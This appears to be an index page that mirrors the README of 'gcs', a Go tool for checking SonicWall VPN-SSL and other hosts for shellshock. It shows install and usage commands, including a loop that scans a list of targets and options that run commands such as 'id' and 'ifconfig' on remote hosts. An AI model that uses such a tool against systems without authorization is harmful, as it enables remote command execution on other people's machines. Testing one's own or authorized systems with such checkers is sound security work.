Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/gustavorobertux/gcs


https://github.com/gustavorobertux/gcs

Last synced: 21 days ago
JSON representation

Awesome Lists containing this project

README

        

# gcs
SonicWall VPN-SSL Exploit Checker* using Golang ( * and other targets vulnerable to shellshock ).

# Install
```
▶ go get -v github.com/gustavorobertux/gcs
```
# Basic Usage
### oneliner
```
▶ for i in $(cat list.txt) ; do echo $i | xargs gcs -i ; done
```
### Simple command - Default -c echo
```
▶ gcs -i x.x.x.x
```
### With commands
```
▶ gcs -i x.x.x.x -c id
▶ gcs -i x.x.x.x -c 'id && ifconfig'
```
# Screenshot